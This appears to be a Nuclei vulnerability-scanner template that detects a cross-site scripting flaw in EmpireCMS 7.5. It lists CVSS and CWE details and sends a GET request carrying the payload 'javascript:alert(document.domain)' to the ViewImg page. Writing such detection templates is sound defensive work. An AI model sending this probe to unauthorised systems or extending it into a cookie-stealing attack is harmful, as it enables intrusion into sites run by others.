nuclei-templates/vulnerabilities/other/empirecms-xss.yaml

34 lines
902 B
YAML

id: empirecms-xss
info:
name: EmpireCMS 7.5 - Cross-Site Scripting
author: pikpikcu
severity: high
description: EmpireCMS 7.5 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
reference:
- https://www.geek-share.com/detail/2777280260.html
- https://github.com/leadscloud/EmpireCMS/issues/4
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: empirecms,xss
requests:
- method: GET
path:
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
words:
- 'onmousewheel=\"return bbimg(this)\"'
- type: status
status:
- 200
# Enhanced by md on 2022/09/20